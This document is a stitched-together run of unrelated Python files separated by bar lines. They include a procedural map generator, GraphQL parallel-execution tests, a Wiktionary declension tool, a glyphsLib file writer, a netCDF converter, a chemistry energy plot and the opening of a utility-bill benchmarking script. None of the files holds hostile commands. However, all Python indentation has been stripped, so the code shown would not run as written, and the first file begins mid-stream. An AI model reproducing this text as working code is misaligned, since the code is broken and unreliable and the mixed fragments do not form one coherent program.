while not is_integer(height):
if height is not None:
print(" Enter an integer.")
height = input(" Height : ")
height = int(height)
print("")
# ... du mode d'utilisation
advanced_mode = input("- Do you want to use advanced mode ? (y - N) : ")
print("")
###############################################################
######################## MODE AVANCÉ ##########################
###############################################################
if advanced_mode == "y" or advanced_mode == "Y":
# ... du seed
choice = input("- Do you want to enter a seed ? (y / N) : ")
if choice == "y" or choice == "Y":
print(" Tip : a seed looks like a:b:c:d where a,b,c,d are integers")
seed_in_string = ""
while not Seed.is_seed(seed_in_string):
if seed_in_string != "":
print(" This is not a seed.")
seed_in_string = input(" Enter the seed : ")
seed = Seed(seed_in_string=seed_in_string)
else:
seed = Seed()
print("")
# ... de la présence d'arbres
choice = input("- Do you want trees on the map ? (Y / n) : ")
place_trees = (choice != "n" and choice != "N")
print("")
###############################################################
######################## MODE BASIQUE #########################
###############################################################
else:
seed = Seed()
place_trees = True
###############################################################
######################### CONSTANTES ##########################
###############################################################
begin_time = time.time()
print_progress_opt = ("idlelib" not in sys.modules)
print("Seed of the map : " + str(seed) + "\n")
encyclopedia = encyclopedia_creation()
###############################################################
############### CRÉATION DU HEADER DE L'IMAGE #################
###############################################################
destination_file = open("generated_map.ppm", "w")
write_image_header(destination_file, height, width, str(seed))
###############################################################
############### CRÉATION DE L'IMAGE AVEC ARBRES ###############
###############################################################
if place_trees:
chunk_height = encyclopedia.get_max_height_of_trees()
# Création du chunk initial
# L'image se crée par chunk de width*chunk_height
# pour économiser la RAM
actual_chunk = BoardBox.create_empty_board(width=width, height=chunk_height)
for line_number in range(chunk_height):
for column_number in range(width):
actual_chunk.set_element(
value=generate_box(
encyclopedia=encyclopedia,
x=column_number,
y=line_number,
seed=seed
),
x=column_number,
y=line_number
)
# Création des chunks intermédiaires
for chunk_number in range(int(height / chunk_height)):
chunk_number += 1
next_chunk = BoardBox.create_empty_board(width=width, height=chunk_height)
for line_number in range(chunk_height):
for column_number in range(width):
next_chunk.set_element(
value=generate_box(
encyclopedia=encyclopedia,
x=column_number,
y=line_number + chunk_number*chunk_height,
seed=seed
),
x=column_number,
y=line_number
)
chunk_amalgamation = BoardBox(actual_chunk.get_elements() + next_chunk.get_elements())
generate_trees(chunk_amalgamation)
actual_chunk = BoardBox(chunk_amalgamation.get_elements()[:chunk_height])
write_image_body(destination_file, actual_chunk)
actual_chunk = BoardBox(chunk_amalgamation.get_elements()[chunk_height:])
if print_progress_opt:
print_progress(
text="Creation of the map : ",
progression=((chunk_number + 1) * chunk_height) / height
)
chunk_number -= 1
# Création du dernier chunk
last_chunk = BoardBox(actual_chunk.get_elements()[0:(height % chunk_height)])
write_image_body(destination_file, last_chunk)
if print_progress_opt:
print_progress("Creation of the map : ", 1.0)
###############################################################
############### CRÉATION DE L'IMAGE SANS ARBRES ###############
###############################################################
else:
for line_number in range(height): # L'image se crée ligne par ligne
chunk = BoardBox.create_empty_board(width, 1)
for column_number in range(width):
chunk.set_element(
value=generate_box(
encyclopedia,
column_number,
line_number,
seed
),
x=column_number,
y=0
)
write_image_body(destination_file, chunk)
if print_progress_opt:
print_progress(
"Creation of the map : ", (line_number + 1) / height)
###############################################################
################ AFFICHAGE DES MESSAGES DE FIN ################
###############################################################
destination_file.close()
print("")
print("Done")
print("Execution time : ", time.time() - begin_time)
|
import numpy as np
import matplotlib
import matplotlib.pyplot as plt
from mpl_toolkits.axes_grid1 import AxesGrid
def shiftedMap(cmap, start=0, midpoint=0.5, stop=1.0, name='shiftedcmap'):
cdict = {
'red': [],
'green': [],
'blue': [],
'alpha': []
}
# regular index to compute the colors
reg_index = np.linspace(start, stop, 257)
# shifted index to match the data
shift_index = np.hstack([
np.linspace(0.0, midpoint, 128, endpoint=False),
np.linspace(midpoint, 1.0, 129, endpoint=True)
])
for ri, si in zip(reg_index, shift_index):
r, g, b, a = cmap(ri)
cdict['red'].append((si, r, r))
cdict['green'].append((si, g, g))
cdict['blue'].append((si, b, b))
cdict['alpha'].append((si, a, a))
newcmap = matplotlib.colors.LinearSegmentedColormap(name, cdict)
plt.register_cmap(cmap=newcmap)
return newcmap |
def foo():
print("Hello justuse-user!") |
import asyncio
from pytest import mark
from graphql.execution import execute
from graphql.language import parse
from graphql.type import (
GraphQLSchema,
GraphQLObjectType,
GraphQLField,
GraphQLList,
GraphQLInterfaceType,
GraphQLBoolean,
GraphQLInt,
GraphQLString,
)
class Barrier:
"""Barrier that makes progress only after a certain number of waits."""
def __init__(self, number: int) -> None:
self.event = asyncio.Event()
self.number = number
async def wait(self) -> bool:
self.number -= 1
if not self.number:
self.event.set()
return await self.event.wait()
def describe_parallel_execution():
@mark.asyncio
async def resolve_fields_in_parallel():
barrier = Barrier(2)
async def resolve(*_args):
return await barrier.wait()
schema = GraphQLSchema(
GraphQLObjectType(
"Query",
{
"foo": GraphQLField(GraphQLBoolean, resolve=resolve),
"bar": GraphQLField(GraphQLBoolean, resolve=resolve),
},
)
)
ast = parse("{foo, bar}")
# raises TimeoutError if not parallel
result = await asyncio.wait_for(execute(schema, ast), 1.0)
assert result == ({"foo": True, "bar": True}, None)
@mark.asyncio
async def resolve_list_in_parallel():
barrier = Barrier(2)
async def resolve(*_args):
return await barrier.wait()
async def resolve_list(*args):
return [resolve(*args), resolve(*args)]
schema = GraphQLSchema(
GraphQLObjectType(
"Query",
{
"foo": GraphQLField(
GraphQLList(GraphQLBoolean), resolve=resolve_list
)
},
)
)
ast = parse("{foo}")
# raises TimeoutError if not parallel
result = await asyncio.wait_for(execute(schema, ast), 1.0)
assert result == ({"foo": [True, True]}, None)
@mark.asyncio
async def resolve_is_type_of_in_parallel():
FooType = GraphQLInterfaceType("Foo", {"foo": GraphQLField(GraphQLString)})
barrier = Barrier(4)
async def is_type_of_bar(obj, *_args):
await barrier.wait()
return obj["foo"] == "bar"
BarType = GraphQLObjectType(
"Bar",
{"foo": GraphQLField(GraphQLString), "foobar": GraphQLField(GraphQLInt)},
interfaces=[FooType],
is_type_of=is_type_of_bar,
)
async def is_type_of_baz(obj, *_args):
await barrier.wait()
return obj["foo"] == "baz"
BazType = GraphQLObjectType(
"Baz",
{"foo": GraphQLField(GraphQLString), "foobaz": GraphQLField(GraphQLInt)},
interfaces=[FooType],
is_type_of=is_type_of_baz,
)
schema = GraphQLSchema(
GraphQLObjectType(
"Query",
{
"foo": GraphQLField(
GraphQLList(FooType),
resolve=lambda *_args: [
{"foo": "bar", "foobar": 1},
{"foo": "baz", "foobaz": 2},
],
)
},
),
types=[BarType, BazType],
)
ast = parse(
"""
{
foo {
foo
... on Bar { foobar }
... on Baz { foobaz }
}
}
"""
)
# raises TimeoutError if not parallel
result = await asyncio.wait_for(execute(schema, ast), 1.0)
assert result == (
{"foo": [{"foo": "bar", "foobar": 1}, {"foo": "baz", "foobaz": 2}]},
None,
)
|
# Author: Xinshuo Weng
# email: [email protected]
import numpy as np
from PIL import Image
import init_paths
from prob_stat import hist_equalization
from xinshuo_visualization import visualize_distribution, visualize_image
def test_hist_equalization():
print('testing for gaussian distribution')
random_data = np.random.normal(0.5, 0.1, 10000)
visualize_distribution(random_data, vis=True)
num_bins = 100
data_equalized = hist_equalization(random_data, num_bins=num_bins)
visualize_distribution(data_equalized, vis=True)
print('testing for image data')
image_path = 'lena.jpg'
img = np.array(Image.open(image_path).convert('L'))
visualize_image(img, vis=True)
num_bins = 256
data_equalized = hist_equalization(img, num_bins=num_bins)
visualize_image(data_equalized, vis=True)
print('\n\nDONE! SUCCESSFUL!!\n')
if __name__ == '__main__':
test_hist_equalization() |
"""
Oracle implementation of Files.InFileset
"""
from WMCore.WMBS.MySQL.Files.InFileset import InFileset as InFilesetMySQL
class InFileset(InFilesetMySQL):
pass
|
"""
Retrieve declination for given word using wiktionary API.
"""
import re
import click
import requests
import tabulate
import bs4
API = 'http://de.wiktionary.org/w/api.php'
@click.command()
@click.argument('word')
@click.option('--table-fmt', type=click.Choice(tabulate.tabulate_formats),
help='Visual text formatting for the output table',
default='simple')
@click.option('-d', '--definition', is_flag=True,
help='Retrieve definition')
def cli(word, definition, table_fmt):
"""Retrieve declination for given word in german."""
response = requests.get(API, params={
'action': 'parse',
'format': 'json',
'page': word
})
response.raise_for_status()
if 'error' not in response.json():
soup = bs4.BeautifulSoup(
response.json()['parse']['text']['*'],
'html.parser'
)
table = HtmlTableParser(
soup, class_=re.compile(r'.*hintergrundfarbe2$'))
table = table.parse()
table.filter_empty()
table.apply_filter('rows', r'.*Alle weiteren Formen.*')
click.echo(tabulate.tabulate(
table.rows, headers='firstrow', tablefmt=table_fmt) + '\n')
if definition:
bedeutungen = [e.get_text() for e in soup
.find('p', title='Sinn und Bezeichnetes (Semantik)')
.find_next_sibling('dl')
.find_all('dd')]
click.secho('Definition', fg='bright_cyan')
click.echo('\n'.join(bedeutungen))
else:
click.secho('Error for word "{}". Code: {}. Info: {}'.format(
word.encode('utf-8'),
response.json()['error'].get('code', 'unknown'),
response.json()['error'].get('info', 'unknown')), fg='yellow')
class HtmlTableParser(object):
"""Given an html and keyword arguments accepted
in find method of BeautifulSoup, get table and
return a Table object.
"""
def __init__(self, html, **kwargs):
self.html = html
self.kwargs = kwargs
self.table = None
def parse(self):
"""Parse an html table. Return a Table object"""
self.table = self.html.find(**self.kwargs)
if self.table is None:
raise click.ClickException(
'No table was found for query: {}'.format(str(self.kwargs)))
rows = []
rowspan = {}
for row in self.table.find_all('tr'):
current = []
c_cell = 0
for cell in row.find_all(re.compile(r'(th|td)')):
if c_cell in rowspan and rowspan[c_cell] > 0:
current.append('')
rowspan[c_cell] -= 1
if cell.name == 'th':
current.append(click.style(
cell.get_text().replace('\n', ' '), fg='bright_blue'))
else:
current.append(cell.get_text().replace('\n', ' '))
if cell.has_attr('colspan'):
current.extend('' for i in range(
int(cell['colspan']) - 1))
if cell.has_attr('rowspan'):
rowspan[c_cell] = int(cell['rowspan']) - 1
c_cell += 1
rows.append(current)
return Table(rows)
@property
def html(self):
"""Proper HTML """
return self._html
@html.setter
def html(self, val):
"""Verify that html is actually a bs4 object """
if not isinstance(val, bs4.element.Tag):
raise ValueError(
'"{}" is not an instance of bs4.element.Tag'.format(val))
self._html = val
class Table(object):
"""Table object for easy dealing with rows, columns
and filters
"""
def __init__(self, data):
self.rows = data
self.columns = list(zip(*data))
def filter_empty(self):
""" Filter empty values from columns and rows """
for col in self.columns[:]:
if all(val == '' for val in col):
for row in self.rows:
del row[self.columns.index(col)]
del self.columns[self.columns.index(col)]
def apply_filter(self, data_item, regex):
""" Apply filter to row or column """
try:
regex = re.compile(regex)
except ValueError:
raise click.ClickException(
'Could not compile regular expression "{}"'.format(regex))
if data_item == 'rows':
self.rows = [e for e in self.rows
if not any(regex.match(i) for i in e)]
self.columns = list(zip(*self.rows))
if data_item == 'columns':
for col in self.columns[:]:
if any(regex.match(val) for val in col):
for row in self.rows:
del row[self.columns.index(col)]
del self.columns[self.columns.index(col)]
|
import time , os
os.system("clear")
txt = "Hello World ! \nThis is a test.\nHope,it will work.\nSee You Soon!"
for i in range(0,len(txt)):
print(txt[i],end="", flush=True)
time.sleep(0.1)
print ("")
my_string = 'Hello world ! This is a test.'
time.sleep(0.3)
for i in range(0,5):
print (my_string,end="\r")
for j in range(0,len(my_string)):
my_string = my_string[1:] + my_string[:1]
print (my_string,end="\r")
time.sleep(0.2)
print ("")
|
# Copyright 2016 Georg Seifert. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http: #www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import glyphsLib.classes
from glyphsLib.types import floatToString5
import logging
import datetime
from collections import OrderedDict
from io import StringIO
"""
Usage
>> fp = open('Path/to/File.glyphs', 'w')
>> writer = Writer(fp)
>> writer.write(font)
>> fp.close()
"""
logger = logging.getLogger(__name__)
class Writer:
def __init__(self, fp, format_version=2):
# figure out whether file object expects bytes or unicodes
try:
fp.write(b"")
except TypeError:
fp.write("") # this better not fail...
# file already accepts unicodes; use it directly
self.file = fp
else:
# file expects bytes; wrap it in a UTF-8 codecs.StreamWriter
import codecs
self.file = codecs.getwriter("utf-8")(fp)
self.format_version = format_version
def write(self, rootObject):
self.writeDict(rootObject)
self.file.write("\n")
def writeDict(self, dictValue):
if hasattr(dictValue, "_serialize_to_plist"):
self.file.write("{\n")
dictValue._serialize_to_plist(self)
self.file.write("}")
return
self.file.write("{\n")
keys = dictValue.keys()
if not isinstance(dictValue, OrderedDict):
keys = sorted(keys)
for key in keys:
try:
if isinstance(dictValue, (dict, OrderedDict)):
value = dictValue[key]
else:
getKey = key
value = getattr(dictValue, getKey)
except AttributeError:
continue
if value is None:
continue
self.writeKeyValue(key, value)
self.file.write("}")
def writeArray(self, arrayValue):
self.file.write("(\n")
idx = 0
length = len(arrayValue)
if hasattr(arrayValue, "plistArray"):
arrayValue = arrayValue.plistArray()
for value in arrayValue:
self.writeValue(value)
if idx < length - 1:
self.file.write(",\n")
else:
self.file.write("\n")
idx += 1
self.file.write(")")
def writeUserData(self, userDataValue):
self.file.write("{\n")
keys = sorted(userDataValue.keys())
for key in keys:
value = userDataValue[key]
self.writeKey(key)
self.writeValue(value, key)
self.file.write(";\n")
self.file.write("}")
def writeKeyValue(self, key, value):
self.writeKey(key)
self.writeValue(value, key)
self.file.write(";\n")
def writeObjectKeyValue(self, d, key, condition=None, keyName=None, default=None):
value = getattr(d, key)
if condition == "if_true":
condition = bool(value)
if condition is None:
if default is not None:
condition = value != default
else:
condition = value is not None
if condition:
self.writeKey(keyName or key)
self.writeValue(value, key)
self.file.write(";\n")
def writeValue(self, value, forKey=None):
if hasattr(value, "plistValue"):
value = value.plistValue(format_version=self.format_version)
if value is not None:
self.file.write(value)
elif forKey in ["color", "strokeColor"] and hasattr(value, "__iter__"):
# We have to write color tuples on one line or Glyphs 2.4.x
# misreads it.
if self.format_version == 2:
self.file.write(str(tuple(value)))
else:
self.file.write("(")
for ix, v in enumerate(value):
self.file.write(str(v))
if ix < len(value) - 1:
self.file.write(",")
self.file.write(")")
elif isinstance(value, (list, glyphsLib.classes.Proxy)):
if isinstance(value, glyphsLib.classes.UserDataProxy):
self.writeUserData(value)
else:
self.writeArray(value)
elif isinstance(value, (dict, OrderedDict, glyphsLib.classes.GSBase)):
self.writeDict(value)
elif type(value) == float:
self.file.write(floatToString5(value))
elif type(value) == int:
self.file.write(str(value))
elif type(value) == bytes:
self.file.write("<" + value.hex() + ">")
elif type(value) == bool:
if value:
self.file.write("1")
else:
self.file.write("0")
elif type(value) == datetime.datetime:
self.file.write('"%s +0000"' % str(value))
else:
value = str(value)
if self.format_version < 3:
if forKey != "unicode":
value = escape_string(value)
else:
if _needs_quotes(value) or " " in value:
value = '"%s"' % value
self.file.write(value)
def writeKey(self, key):
key = escape_string(key)
self.file.write("%s = " % key)
def dump(obj, fp):
"""Write a GSFont object to a .glyphs file.
'fp' should be a (writable) file object.
"""
writer = Writer(fp)
logger.info("Writing .glyphs file")
if hasattr(obj, "format_version"):
writer.format_version = obj.format_version
writer.write(obj)
def dumps(obj):
"""Serialize a GSFont object to a .glyphs file format.
Return a (unicode) str object.
"""
fp = StringIO()
dump(obj, fp)
return fp.getvalue()
NSPropertyListNameSet = (
# 0
False,
False,
False,
False,
False,
False,
False,
False,
False,
False,
False,
False,
False,
False,
False,
False,
# 16
False,
False,
False,
False,
False,
False,
False,
False,
False,
False,
False,
False,
False,
False,
False,
False,
# 32
False,
False,
False,
False,
True,
False,
False,
False,
False,
False,
False,
False,
False,
False,
True,
False,
# 48
True,
True,
True,
True,
True,
True,
True,
True,
True,
True,
False,
False,
False,
False,
False,
False,
# 64
False,
True,
True,
True,
True,
True,
True,
True,
True,
True,
True,
True,
True,
True,
True,
True,
# 80
True,
True,
True,
True,
True,
True,
True,
True,
True,
True,
True,
False,
False,
False,
False,
True,
# 96
False,
True,
True,
True,
True,
True,
True,
True,
True,
True,
True,
True,
True,
True,
True,
True,
# 112
True,
True,
True,
True,
True,
True,
True,
True,
True,
True,
True,
False,
False,
False,
False,
False,
)
def _needs_quotes(string):
if len(string) == 0:
return True
# Does it need quotes because of special characters?
for c in string:
d = ord(c)
if d >= 128 or not NSPropertyListNameSet[d]:
return True
# Does it need quotes because it could be confused with a number?
try:
int(string)
except ValueError:
pass
else:
return True
try:
float(string)
except ValueError:
return False
else:
return True
def escape_string(string):
if _needs_quotes(string):
string = string.replace("\\", "\\\\")
string = string.replace('"', '\\"')
string = string.replace("\n", "\\012")
string = '"%s"' % string
return string
|
"""
20161208 Scott Havens
Convert the IPW images for the topo input into a netCDF file
"""
from datetime import datetime
import netCDF4 as nc
from smrf import ipw
file_name = 'topo.nc'
f = {
'dem': 'dem.ipw',
'mask': 'mask.ipw',
'veg_height': 'veg_height.ipw',
'veg_k': 'veg_k.ipw',
'veg_tau': 'veg_tau.ipw',
'veg_type': 'veg_type.ipw'
}
# get the x,y
d = ipw.IPW(f['dem'])
x = d.bands[0].x
y = d.bands[0].y
# create the netCDF file
s = nc.Dataset(file_name, 'w', format='NETCDF4', clobber=True)
# add dimensions
dimensions = ['y', 'x']
s.createDimension(dimensions[0], y.shape[0])
s.createDimension(dimensions[1], x.shape[0])
# create the variables
s.createVariable('y', 'f', dimensions[0])
s.createVariable('x', 'f', dimensions[1])
# define some attributes
setattr(s.variables['y'], 'units', 'meters')
setattr(s.variables['y'], 'description', 'UTM, north south')
setattr(s.variables['x'], 'units', 'meters')
setattr(s.variables['x'], 'description', 'UTM, east west')
# define some global attributes
fmt = '%Y-%m-%d %H:%M:%S'
setattr(s, 'Conventions', 'CF-1.6')
setattr(s, 'dateCreated', datetime.now().strftime(fmt))
setattr(s, 'title', 'Distirbuted data from SMRF')
setattr(s, 'history', '[%s] Create netCDF4 file' % datetime.now().strftime(fmt))
s.variables['y'][:] = y
s.variables['x'][:] = x
for key,file_image in f.items():
d = ipw.IPW(file_image)
s.createVariable(key, 'f', (dimensions[0],dimensions[1]))
s.variables[key][:] = d.bands[0].data
s.close()
|
import setuptools
#long_description = open('README.md').read()
setuptools.setup(
name='canary_training',
version='0.1',
author='broydj',
author_email='[email protected]',
description='',
#long_description=long_description,
#long_description_content_type='text/markdown',
url='',
#packages=setuptools.find_packages('src'),
#package_dir={'': 'src'},
packages=['canary_training'],
package_data={"canary_training": ["instance_data_unnormalized.csv","instance_price_info.csv"]}
#package_dat a= {"canary_training": "instance_price_info.csv"}
#classifiers=[
# 'Programming Language :: Python :: 3',
# 'Operating System :: OS Independent',
#],
#python_requires='>=3',
)
|
# File automatically generated by mapry. DO NOT EDIT OR APPEND!
"""defines some object graph."""
import typing
class SomeGraph:
"""defines some object graph."""
def __init__(
self,
map_of_strings: typing.MutableMapping[str, str]) -> None:
"""
initializes an instance of SomeGraph with the given values.
:param map_of_strings: tests a map of strings.
"""
self.map_of_strings = map_of_strings
# File automatically generated by mapry. DO NOT EDIT OR APPEND!
|
import numpy as np
from scipy.interpolate import spline
import matplotlib.pyplot as plt
plt.style.use('paper2')
r1_Pd2plus = [1.6, 1.7030303, 1.80606061, 1.90909091, 2.01212121, 2.11515152, 2.21818182, 2.32121212, 2.42424242,
2.52727273, 2.63030303, 2.73333333, 2.83636364, 2.93939394, 3.04242424, 3.14545455, 3.24848485,
3.35151515, 3.45454545, 3.55757576, 3.66060606, 3.76363636, 3.86666667, 3.96969697, 4.07272727,
4.17575758, 4.27878788, 4.38181818, 4.48484848, 4.58787879, 4.69090909, 4.79393939, 4.8969697]
rel_e_Pd2plus = [38.11222905,
16.09151587,
5.16067295,
0.686415975,
0.0,
1.35282725,
3.822761375,
6.69154705,
9.5241197,
12.27489772,
14.69121198,
16.79875857,
18.65167195,
20.1697827,
21.40692405,
22.4070963,
23.16556182,
23.71415998,
24.10442105,
24.35747925,
24.5069623,
24.57261762,
24.57175795,
24.5190103,
24.4292276,
24.3082456,
24.16110313,
23.9930147,
23.80596323,
23.6098381,
23.39979502,
23.1783942,
22.94677767]
r1_pyridine = [2.11, 2.2, 2.31, 2.41, 2.5, 2.61, 2.7, 2.8, 2.91, 3, 3.11, 3.21, 3.3, 3.41, 3.5, 3.51, 3.6, 3.7, 3.8,
3.9, 4, 4.1, 4.2, 4.3, 4.4, 4.5, 4.61, 4.71, 4.81, 4.91, 5.01]
rel_e_Pd2plus_py = [37.86495013, 28.04610622, 19.53074298, 13.25679718, 9.374743325, 6.095378125, 4.1413494,
2.599738775, 1.234461925, 0.720602175, 0.561919975, 0, 0.135772175, 0.311760825, 0.71337965,
0.66255215, 1.013468975, 1.2578614, 1.898043175, 2.08690185, 2.47176015, 2.892392225, 3.3117191,
3.68095265, 4.04610745, 4.4086393, 4.67067075, 4.7327054, 4.94059615, 5.10161265, 5.19493445]
rel_e_2plus_py = [22.30252343, 17.48407015, 13.09094265, 9.6683694, 7.2093977, 4.989170925, 3.403804725, 2.110389175,
1.11560715, 0.633931875, 0.23407005, 0, 0.233932, 0.179069675, 0.363655075, 0.349486125, 0.513753075,
0.7560622, 1.032808525, 1.3966895, 1.83969195, 2.1511202, 2.264114125, 2.579156775, 2.848241325,
3.1159642, 3.335030725, 3.499460825, 3.63506985, 3.7076214, 3.78007255]
rel_e_py = [
#39.7421854,
#30.6156999,
23.46876355,
18.70673507,
14.16180905,
10.63418602,
8.30607945,
6.10744495,
4.70415415,
3.41850705,
2.463383025,
1.859564875,
1.30330495,
0.855125625,
0.5731083,
0.315362675,
0.155387825,
0.170196825,
0.057673525,
0.002604125,
0.0,
0.013949325,
0.0323037,
0.052904525,
0.079560725,
0.12307785,
0.170435275,
0.220635275,
0.2793128,
0.34704515,
0.417915,
0.47937235,
0.551126975
]
if __name__ == '__main__':
# Min point is 11
more_r1 = np.linspace(min(r1_Pd2plus), max(r1_Pd2plus), 200)
smooth_rel_e_Pd2plus = spline(r1_Pd2plus[::2], rel_e_Pd2plus[::2], more_r1)
plt.plot(more_r1, smooth_rel_e_Pd2plus, ls='-', c='k', lw=1.5, alpha=0.3)
plt.scatter(r1_Pd2plus, rel_e_Pd2plus, marker='o', c='k', label='Pd$^{2+}$', alpha=0.3)
more_r1 = np.linspace(min(r1_pyridine), max(r1_pyridine), 200)
smooth_rel_e_Pd2plus_py = spline(r1_pyridine[::2], rel_e_Pd2plus_py[::2], more_r1)
plt.plot(more_r1, smooth_rel_e_Pd2plus_py, ls='-', c='k', lw=1.5)
plt.scatter(r1_pyridine, rel_e_Pd2plus_py, marker='s', label='[Pd(pyridine)$_4$]$^{2+}$', c='k')
smooth_rel_e_2plus_py = spline(r1_pyridine, rel_e_2plus_py, more_r1)
plt.plot(more_r1, smooth_rel_e_2plus_py, ls='-', c='k', lw=1.5)
plt.scatter(r1_pyridine, rel_e_2plus_py, marker='^', label='[(pyridine)$_4$]$^{2+}$', c='k')
smooth_rel_e_py = spline(r1_pyridine, rel_e_py, more_r1)
plt.plot(more_r1, smooth_rel_e_py, ls='-', c='k', lw=1.5)
plt.scatter(r1_pyridine, rel_e_py, marker='D', label='[(pyridine)$_4$]', c='k')
plt.ylabel('$\Delta E$ / kcal mol$^{-1}$')
plt.xlabel('$r$ / Å')
plt.ylim(-3, 30)
# plt.legend(prop={'size': 13})
plt.tight_layout()
plt.show()
|
""" -------------------- MAIN BENCHMARKING SCRIPT -----------------------
Run this script by executing the following from a command prompt:
python3 benchmark.py
Or, use just "python benchmark.py" if that is how you normally access Python 3.
One some operating systems (Linux, Mac OSX), you may be able to run the script
by executing "./benchmark.py" if you have changed the file mode of the file
to be executable.
This script uses settings from a "settings.py" file, which should be placed
in the same directory as this script. Start by copying "settings_example.py"
to "settings.py" and then modify settings in that copied file.
In the settings file, you can specify the path to the Utility Bill CSV file you
want to read and the spreadsheet Other Data file, which contains the list of
sites to process, information (e.g. square feet) about each site, and degree day
data. Modify this spreadsheet according to your needs; create multiple
versions if you sometimes only want to process some of the sites. The "data"
directory is the best place to put Utility Bill and Other Data files.
All reports and other output from this script appear in the "output" directory.
View the resulting benchmarking report by opening the "output/index.html" file.
Other useful data is put in the "output/extra_data" directory, including a
spreadsheet that summarizes utility information for all of the buildings.
Each time the script is run, all files in the output directory are deleted and
replaced with new files. So, if you have modified any of these files and want
to save your modifications, copy the files to a location outside the output
directory.
The main script code is found at the *bottom* of this file; prior to the script
are the functions that do that main work. This code handles the main control
flow of the script. This script also relies on a couple
of modules: bench_util.py, graph_util.py, and template_util.py
These are present in this directory.
"""
import time
import pickle
import glob
import os
import pprint
import datetime
import warnings
import pandas as pd
import numpy as np
import bench_util as bu
import graph_util as gu
import template_util
import shutil
import settings # the file holding settings for this script
# Filter out Matplotlib warnings, as we sometimes get warnings
# related to blank graphs.
warnings.filterwarnings("ignore", module="matplotlib")
#*****************************************************************************
#*****************************************************************************
# ----------------------Function for Preprocessing Data ----------------------
def preprocess_data():
"""Loads and processes the Utility Bill data into a smaller and more usable
form. Returns
- a DataFrame with the raw billing data,
- a DataFrame with the preprocessed data,
- and a bench_util.Util object, which provides useful functions to
the analysis portion of this script.
This the "preprocess_data.ipynb" was used to develop this code and shows
intermdediate results from each of the steps.
"""
# --- Read the CSV file and convert the billing period dates into
# real Pandas dates
fn = settings.UTILITY_BILL_FILE_PATH
msg('Starting to read Utility Bill Data File.')
dfu = pd.read_csv(fn,
parse_dates=['From', 'Thru'],
dtype={'Site ID': 'object', 'Account Number': 'object'}
)
msg('Removing Unneeded columns and Combining Charges.')
# Filter down to the needed columns and rename them
cols = [
('Site ID', 'site_id'),
('From', 'from_dt'),
('Thru', 'thru_dt'),
('Service Name', 'service_type'),
('Item Description', 'item_desc'),
('Usage', 'usage'),
('Cost', 'cost'),
('Units', 'units'),
]
old_cols, new_cols = zip(*cols) # unpack into old and new column names
dfu1 = dfu[list(old_cols)].copy() # select just those columns from the origina dataframe
dfu1.columns = new_cols # rename the columns
# --- Collapse Non-Usage Changes into "Other Charge"
# This cuts the processing time in half due to not having to split a whole
# bunch of non-consumption charges.
dfu1.loc[np.isnan(dfu1.usage), 'item_desc'] = 'Other Charge'
# Pandas can't do a GroupBy on NaNs, so replace with something
dfu1.units.fillna('-', inplace=True)
dfu1 = dfu1.groupby(['site_id',
'from_dt',
'thru_dt',
'service_type',
'item_desc',
'units']).sum()
dfu1.reset_index(inplace=True)
# --- Split Each Bill into Multiple Pieces, each within one Calendar Month
msg('Split Bills into Calendar Month Pieces.')
# Split all the rows into calendar month pieces and make a new DataFrame
recs=[]
for ix, row in dfu1.iterrows():
# it is *much* faster to modify a dictionary than a Pandas series
row_tmpl = row.to_dict()
# Pull out start and end of billing period; can drop the from & thru dates now
# doing split-up of billing period across months.
st = row_tmpl['from_dt']
en = row_tmpl['thru_dt']
del row_tmpl['from_dt']
del row_tmpl['thru_dt']
for piece in bu.split_period(st, en):
new_row = row_tmpl.copy()
new_row['cal_year'] = piece.cal_year
new_row['cal_mo'] = piece.cal_mo
# new_row['days_served'] = piece.days_served # not really needed
new_row['usage'] *= piece.bill_frac
new_row['cost'] *= piece.bill_frac
recs.append(new_row)
dfu2 = pd.DataFrame(recs, index=range(len(recs)))
# --- Sum Up the Pieces by Month
dfu3 = dfu2.groupby(
['site_id', 'service_type', 'cal_year', 'cal_mo', 'item_desc', 'units']
).sum()
dfu3 = dfu3.reset_index()
#--- Make a utility function object
msg('Make an Object containing Useful Utility Functions.')
dn = settings.OTHER_DATA_DIR_PATH
ut = bu.Util(dfu, dn)
# --- Add MMBtus Fiscal Year Info and MMBtus
msg('Add MMBtu Information.')
mmbtu = []
for ix, row in dfu3.iterrows():
row_mmbtu = ut.fuel_btus_per_unit(row.service_type, row.units) * row.usage / 1e6
if np.isnan(row_mmbtu): row_mmbtu = 0.0
mmbtu.append(row_mmbtu)
dfu3['mmbtu'] = mmbtu
# Now that original service types have been used to determine MMBtus,
# convert all service types to standard service types.
dfu3['service_type'] = dfu3.service_type.map(ut.service_to_category())
# This may cause multiple rows for a fiscal month and service type.
# Re-sum to reduce to least number of rows.
dfu4 = dfu3.groupby(
['site_id', 'service_type', 'cal_year', 'cal_mo', 'item_desc', 'units']
).sum()
dfu4 = dfu4.reset_index()
# Add the fiscal year information
msg('Add Fiscal Year Information.')
fyr = []
fmo = []
for cyr, cmo in zip(dfu4.cal_year, dfu4.cal_mo):
fis_yr, fis_mo = bu.calendar_to_fiscal(cyr, cmo)
fyr.append(fis_yr)
fmo.append(fis_mo)
dfu4['fiscal_year'] = fyr
dfu4['fiscal_mo'] = fmo
msg('Preprocessing complete!')
return dfu, dfu4, ut
#******************************************************************************
#******************************************************************************
# --------- Functions that That Produce Reports for One Site ----------
""" Each of these functions returns, at a minimum, a dictionary containing
data for the report template.
The functions frequently have some or all of the following input parameters, which
are documented here:
Input parameters:
site: The Site ID of the site to analyze.
df: The preprocessed Pandas DataFrame of Utility Bill information.
ut: The bench_util.Util object that provides additional site data
needed in the benchmarking process.
The functions all save the required graphs for their respective reports to the
directory determined in the graph_util.graph_filename_url() function.
"""
# --------------------- Building Information Report -----------------------
def building_info_report(site, ut, report_date_time):
"""
'report_date_time' is a string giving the date/time this benchmarking
script was run.
"""
# This function returns all the needed info for the report, except
# the date updated
info = ut.building_info(site)
return dict(
building_info = dict(
date_updated = report_date_time,
bldg = info
)
)
# -------------------------- Energy Index Report ----------------------------
def energy_index_report(site, df, ut):
"""As well as returning template data, this function writes a spreadsheet
that summarizes values for every building. The spreadsheet is written to
'output/extra_data/site_summary_FYYYYY.xlsx'.
"""
# Start a dictionary with the main key to hold the template data
template_data = {'energy_index_comparison': {}}
